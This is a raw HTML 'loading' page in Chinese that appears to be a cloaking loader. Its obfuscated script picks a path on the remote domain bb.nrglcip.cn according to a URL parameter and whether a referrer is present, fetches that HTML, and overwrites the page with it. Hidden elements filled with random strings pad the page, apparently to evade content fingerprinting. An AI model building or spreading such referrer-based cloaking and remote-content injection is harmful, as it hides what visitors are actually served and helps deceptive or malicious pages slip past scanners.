<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GfaiEvxRZWJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GfaiEvxRZWJ .DGy8ko9xCfy {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GfaiEvxRZWJ .content {
            line-height: 50px;
            text-align: center
        }

        .GfaiEvxRZWJ .img {
            width: 100%
        }

        .GfaiEvxRZWJ .wJaI2Blkq {
            text-align: center
        }

        .GfaiEvxRZWJ .wJaI2Blkq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GfaiEvxRZWJ .wJaI2Blkq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GfaiEvxRZWJ .wJaI2Blkq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GfaiEvxRZWJ .wJaI2Blkq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GfaiEvxRZWJ .wJaI2Blkq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GfaiEvxRZWJ .wJaI2Blkq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GfaiEvxRZWJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tnK7m2wFx4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var e6CgHy = tnK7m2wFx4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ e6CgHy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ e6CgHy +".html?a=share";
		}
		
        GpIu9dVQV=url+"#"+new Date().getTime();
        GpIu9dVQV && function() {
            $.get(GpIu9dVQV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >etnEmgJdL3vvfQxp6rfUUv9oAgldLLOc8U6JbqXPX</b>
<p  style='display:none'>aUYem41rVvprf6rRPxKHOAhajNM6YBVt15MDEzMH3Bh1FtjJROB0jRn2dawbgeJ7tz0ZZsGokogSRk1QQ0RThWjVWVNbLZ66ailW</p>
<p  style='display:none'>aUYem41rVvprf6rRPxKHOAhajNM6YBVt15MDEzMH3Bh1FtjJROB0jRn2dawbgeJ7tz0ZZsGokogSRk1QQ0RThWjVWVNbLZ66ailW</p>
<ul style='display:none' >zMzCRSWbcat</ul>
<img  src='' style='display:none'>
<p  style='display:none'>aUYem41rVvprf6rRPxKHOAhajNM6YBVt15MDEzMH3Bh1FtjJROB0jRn2dawbgeJ7tz0ZZsGokogSRk1QQ0RThWjVWVNbLZ66ailW</p><div class="GfaiEvxRZWJ">
    <div class="DGy8ko9xCfy">
        <div class="wJaI2Blkq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >GhAh31Ww2P9JQWdW7flz9LsaqXiIolzcwZdSwn1GEUQevHFeIGMYWd2GKI61PU0ZNNQwsrETa0jGGPvvYHHoGkNaGwNCo2o0TYDG9</h1>
<img  src='' style='display:none'>
<li style='display:none' >OzpM8JBSaeRpYt6w6mub4D2ogU5Cc5SbdDSR0V3WWv907SA1JqQ01ydcWtLLvJNHch4Ffg</li></body>
</html>